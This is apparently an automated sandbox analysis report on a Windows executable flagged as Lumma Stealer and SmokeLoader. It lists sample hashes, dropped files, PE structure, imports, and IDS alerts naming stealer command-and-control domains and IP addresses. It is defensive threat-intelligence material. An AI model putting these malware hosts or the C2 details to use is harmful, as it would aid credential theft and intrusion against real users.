	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	172.67.166.231
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.16.74
AKAMAI-ASN1EU	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	BJRX4k4WYc.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	TCoH7VTdPv.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	yEIhhlohep.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	0S2jhDIWWK.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	23.197.127.21
	Y1e7n1NMkI.exe	Get hash	malicious	Coinhive	Browse	104.123.154.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	104.21.14.101 188.114.97.3 23.197.127.21 188.114.96.3 172.67.204.20 172.67.166.231 185.149.100.242

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\46F6.exe	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
C:\Users\user\AppData\Local\Temp\E9D3.exe	biwnisjWwm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	QV2dxxqd9e.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	zWz9Tg85Vb.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	CmkL4zIoRs.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	bPgA5pa3Tk.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse
	WIvsm2g8PA.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\46F6.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	15523840
Entropy (8bit):	6.567845216180378
Encrypted:	false
SSDEEP:	98304:NNWHdyyFgI/1YajDXqUnQi7kmeHh2yeH7rkfvVs9TIIhLESEG3H/OvVn:Logm1YkXqUnQi7ZkfvVs9TIIqSpA
MD5:	E624D8FC1206C879495A1F3A670F253D
SHA1:	B519BBAD4E4D7C435F96A634A37EC476EA1CF9E5
SHA-256:	7C4B4F1A1F108F68B76B671C61733F392114BBFF28813279B67B63C5FE3939B9
SHA-512:	59924B4518601A741633E40D7E2750D813A98ECA9653246B984C157537D89D900054D15F5FCF3182B4854D18DC6682518C8CC36AF783EB368BB7D1740C5B66EA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\46F6.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: biwnisjWwm.exe, Detection: malicious, Browse Filename: QV2dxxqd9e.exe, Detection: malicious, Browse Filename: WPC6G1Ykup.exe, Detection: malicious, Browse Filename: P61q5FVlmo.exe, Detection: malicious, Browse Filename: zWz9Tg85Vb.exe, Detection: malicious, Browse Filename: SUevAm2tWO.exe, Detection: malicious, Browse Filename: HliN0ju7OT.exe, Detection: malicious, Browse Filename: CmkL4zIoRs.exe, Detection: malicious, Browse Filename: bPgA5pa3Tk.exe, Detection: malicious, Browse Filename: WIvsm2g8PA.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..+....................@.............................`............`... .........................................N...............CB......X............`..................................(...................\|...@............................text...p.+.......+.................`.``.data...P.....+.......+.............@.`..rdata..."4..p...$4..P..............@.`@.pdata..X............t..............@.0@.xdata..D............v..............@.0@.bss....`.............................`..edata..N...........................@.0@.idata..............................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...CB.......D..................@.0..reloc.......`......................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\E9D3.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2097152
Entropy (8bit):	6.715421894829642
Encrypted:	false
SSDEEP:	49152:wv9EtY/18WmXsQyVOwJoNWu1vCHdrWTz+pmjjhnlQD38kF:uWm8sQF1vCMe
MD5:	85B1854B81D15AC9116AA200304D7CA0
SHA1:	0FE99B5F0DE3C371CC1E1C5688B5F04E9DAB038F
SHA-256:	F1530D12529D8B0ED379457FEEE1A7CFC223596F455EA0D0771F414699BC88F5
SHA-512:	663154AD674325045457DD5C68F75B4FC9CA61C205E704BBABC1F74BDE0DA39606515DBB30CBE40EEEFA1B2D99A964D0CAC5210D532BB05DDDF15B969F2E1BDB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View:	Filename: biwnisjWwm.exe, Detection: malicious, Browse Filename: QV2dxxqd9e.exe, Detection: malicious, Browse Filename: WPC6G1Ykup.exe, Detection: malicious, Browse Filename: P61q5FVlmo.exe, Detection: malicious, Browse Filename: zWz9Tg85Vb.exe, Detection: malicious, Browse Filename: SUevAm2tWO.exe, Detection: malicious, Browse Filename: HliN0ju7OT.exe, Detection: malicious, Browse Filename: CmkL4zIoRs.exe, Detection: malicious, Browse Filename: bPgA5pa3Tk.exe, Detection: malicious, Browse Filename: WIvsm2g8PA.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....`.f.........................`.............@..............................&....... ...`... ...............................................&.H.....&.8....p...\............&............................. d..(.....................&.X............................text...H...........................`..`.data...............................@....rdata..............................@..@.pdata...\...p...^...H..............@..@.xdata..$G.......H..................@..@.bss.....^... ..........................idata..H.....&.....................@....CRT....X.....&.....................@....tls..........&.....................@....rsrc...8.....&.....................@..@.reloc........&.....................@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\ssegbth

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	216064
Entropy (8bit):	5.64960730061761
Encrypted:	false
SSDEEP:	3072:+nLAF9Hh1ixm20saYC5uyq/pkxePmxGj49wBv5vFa:SLAF9B8q3YKurpRgJWa
MD5:	BEAD29639262D9E62E74E23EB65EB480
SHA1:	BFF76800B0EAFCA77CE5DB423CEAED0A1885962B
SHA-256:	18B275BC2019A1023703C48AF79133BC6BDFCE5EA68B72837C3EA96244D0EA7D
SHA-512:	D2F0FFED0D8443958610ABC7F601153089A1E2A209B180EE81E99E2BF4B2756380481731DAE2BAE1617FB81F875F43D08E72372004A9FE793711A4F3E2EA9BA4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%..@v..@v..@v9..v..@v...v..@v...v..@v...v..@v..;v..@v..Av..@v...v..@v...v..@v...v..@vRich..@v........................PE..L.....qe.................`...................p....@..................................R.........................................<.......0............................................................................p...............................text...l^.......`.................. ..`.rdata...#...p...$...d..............@..@.data...\|&......."..................@....rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ssegbth:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.64960730061761
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	oRKal761Qm.exe
File size:	216'064 bytes
MD5:	bead29639262d9e62e74e23eb65eb480
SHA1:	bff76800b0eafca77ce5db423ceaed0a1885962b
SHA256:	18b275bc2019a1023703c48af79133bc6bdfce5ea68b72837c3ea96244d0ea7d
SHA512:	d2f0ffed0d8443958610abc7f601153089a1e2a209b180ee81e99e2bf4b2756380481731dae2bae1617fb81f875f43d08e72372004a9fe793711a4f3e2ea9ba4
SSDEEP:	3072:+nLAF9Hh1ixm20saYC5uyq/pkxePmxGj49wBv5vFa:SLAF9B8q3YKurpRgJWa
TLSH:	02249D1133D8E032CC9B07394575C6A06A3ABC6157B1B14F7EA83BBF6E33AE05626345
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%..@v..@v..@v9..v..@v...v..@v...v..@v...v..@v..;v..@v..Av..@v...v..@v...v..@v...v..@vRich..@v........................PE..L..

File Icon


Icon Hash:	73a73bb18b939bcc

Static PE Info

General

Entrypoint:	0x40158e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6571B690 [Thu Dec 7 12:12:00 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a9a979e7f48a94e95c9f6a0cf472c0d3

Entrypoint Preview

Instruction
call 00007FC065020162h
jmp 00007FC06501C3DEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0042BBF8h], eax
mov dword ptr [0042BBF4h], ecx
mov dword ptr [0042BBF0h], edx
mov dword ptr [0042BBECh], ebx
mov dword ptr [0042BBE8h], esi
mov dword ptr [0042BBE4h], edi
mov word ptr [0042BC10h], ss
mov word ptr [0042BC04h], cs
mov word ptr [0042BBE0h], ds
mov word ptr [0042BBDCh], es
mov word ptr [0042BBD8h], fs
mov word ptr [0042BBD4h], gs
pushfd
pop dword ptr [0042BC08h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0042BBFCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0042BC00h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0042BC0Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0042BB48h], 00010001h
mov eax, dword ptr [0042BC00h]
mov dword ptr [0042BAFCh], eax
mov dword ptr [0042BAF0h], C0000409h
mov dword ptr [0042BAF4h], 00000001h
mov eax, dword ptr [0042A004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0042A008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000B4h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x289cc	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d000	0xa130	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x27000	0x198	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25e6c	0x26000	c9351c4a181f13b7ec22fe760911817f	False	0.5490208675986842	data	5.858496467824535	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x27000	0x2300	0x2400	011db1ac45b97c9dbae01a57e5fa1e80	False	0.3677300347222222	data	5.522998172151036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2a000	0x1267c	0x2200	4658a3211c489baa879b5311f5371b0f	False	0.18968290441176472	data	2.062241184605367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d000	0xa130	0xa200	aeb12820a0e6c0cdffe704be89244884	False	0.3757474922839506	data	4.493722788196582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x42c40	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0x42d88	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x42eb8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x45488	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x3d4c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.36300639658848616
RT_ICON	0x3e368	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.572202166064982
RT_ICON	0x3ec10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6175115207373272
RT_ICON	0x3f2d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6748554913294798
RT_ICON	0x3f840	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.43049792531120334
RT_ICON	0x41de8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5315573770491804
RT_ICON	0x42770	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5150709219858156
RT_STRING	0x46528	0x66	data			0.6274509803921569
RT_STRING	0x46590	0x1fc	data			0.5039370078740157
RT_STRING	0x46790	0x608	data			0.43976683937823835
RT_STRING	0x46d98	0x14e	data			0.5059880239520959
RT_STRING	0x46ee8	0x1b8	data			0.525
RT_STRING	0x470a0	0x90	data			0.6388888888888888
RT_GROUP_CURSOR	0x42d70	0x14	data			1.15
RT_GROUP_CURSOR	0x45460	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x46330	0x14	data			1.25
RT_GROUP_ICON	0x42bd8	0x68	data	Turkish	Turkey	0.7115384615384616
RT_VERSION	0x46348	0x1dc	data			0.5798319327731093

Imports

DLL

Import

KERNEL32.dll

GetFullPathNameA, UnregisterWait, GlobalDeleteAtom, TryEnterCriticalSection, DebugActiveProcessStop, GetLogicalDriveStringsW, GetComputerNameW, GetModuleHandleW, GetTickCount, GetCommandLineA, GetSystemTimes, GlobalAlloc, Sleep, FormatMessageW, DeleteVolumeMountPointW, HeapCreate, WriteConsoleW, GetAtomNameW, GetTimeZoneInformation, VirtualUnlock, GetShortPathNameA, InterlockedExchange, GetProcAddress, GetNumaHighestNodeNumber, LoadLibraryA, OpenWaitableTimerW, OpenJobObjectW, SetCommMask, FoldStringW, GetDefaultCommConfigA, CreateWaitableTimerW, lstrcatW, FreeEnvironmentStringsW, EnumDateFormatsW, SetCalendarInfoA, SetFileShortNameA, DebugBreak, GetLastError, HeapFree, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, ReadFile, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, FlushFileBuffers, CreateFileA, CloseHandle, GetModuleHandleA

USER32.dll

GetActiveWindow, IntersectRect

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-19T09:29:19.092234+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49769	443	192.168.2.4	104.21.14.101
2024-08-19T09:29:17.530049+0200	TCP	2054955	ET MALWARE Observed Lumma Stealer Related Domain (languagedscie .shop in TLS SNI)	1	49768	443	192.168.2.4	188.114.97.3
2024-08-19T09:28:15.588614+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49743	80	192.168.2.4	189.163.89.217
2024-08-19T09:30:00.813101+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49773	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:18.037380+0200	UDP	2054952	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (complaintsipzzx .shop)	1	63992	53	192.168.2.4	1.1.1.1
2024-08-19T09:30:26.084292+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49777	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:50.138098+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49761	80	192.168.2.4	189.163.89.217
2024-08-19T09:30:32.578026+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49778	80	192.168.2.4	189.163.89.217
2024-08-19T09:30:19.028848+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49776	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:23.077567+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49772	443	192.168.2.4	188.114.97.3
2024-08-19T09:28:21.024348+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49748	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:14.516287+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49742	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:16.666905+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49744	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:16.483913+0200	TCP	2054959	ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI)	1	49767	443	192.168.2.4	188.114.96.3
2024-08-19T09:29:15.973082+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49766	443	192.168.2.4	172.67.204.20
2024-08-19T09:28:22.109299+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49749	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:18.847626+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49746	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:13.767664+0200	UDP	2054962	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (writerospzm .shop)	1	63947	53	192.168.2.4	1.1.1.1
2024-08-19T09:29:19.223911+0200	UDP	2054950	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (quialitsuzoxm .shop)	1	64486	53	192.168.2.4	1.1.1.1
2024-08-19T09:28:35.697332+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49758	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:12.662268+0200	TCP	2054959	ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI)	1	49764	443	192.168.2.4	188.114.96.3
2024-08-19T09:29:14.702744+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49765	443	192.168.2.4	172.67.166.231
2024-08-19T09:28:32.231026+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49755	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:52.292928+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49763	80	192.168.2.4	189.163.89.217
2024-08-19T09:30:13.155090+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49775	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:29.966215+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49753	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:12.364262+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49740	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:20.479199+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49770	443	192.168.2.4	188.114.96.3
2024-08-19T09:28:31.106868+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49754	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:11.970850+0200	UDP	2054958	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (bassizcellskz .shop)	1	50771	53	192.168.2.4	1.1.1.1
2024-08-19T09:28:34.392816+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49757	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:16.990282+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49767	443	192.168.2.4	188.114.96.3
2024-08-19T09:28:19.949247+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49747	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:17.765041+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49745	80	192.168.2.4	189.163.89.217
2024-08-19T09:30:51.114459+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	61795	80	192.168.2.4	58.151.148.90
2024-08-19T09:29:13.516188+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49764	443	192.168.2.4	188.114.96.3
2024-08-19T09:29:15.230729+0200	TCP	2054961	ET MALWARE Observed Lumma Stealer Related Domain (deallerospfosu .shop in TLS SNI)	1	49766	443	192.168.2.4	172.67.204.20
2024-08-19T09:30:57.878034+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	61796	80	192.168.2.4	58.151.148.90
2024-08-19T09:28:08.999158+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49736	80	192.168.2.4	77.29.6.193
2024-08-19T09:29:17.979654+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49768	443	192.168.2.4	188.114.97.3
2024-08-19T09:28:11.289409+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49739	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:51.211914+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49762	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:27.745095+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49751	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:18.541547+0200	TCP	2054953	ET MALWARE Observed Lumma Stealer Related Domain (complaintsipzzx .shop in TLS SNI)	1	49769	443	192.168.2.4	104.21.14.101
2024-08-19T09:29:16.998251+0200	UDP	2054956	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (mennyudosirso .shop)	1	60883	53	192.168.2.4	1.1.1.1
2024-08-19T09:30:07.367374+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49774	80	192.168.2.4	189.163.89.217
2024-08-19T09:28:33.316557+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49756	80	192.168.2.4	189.163.89.217
2024-08-19T09:31:03.858807+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	61797	80	192.168.2.4	58.151.148.90
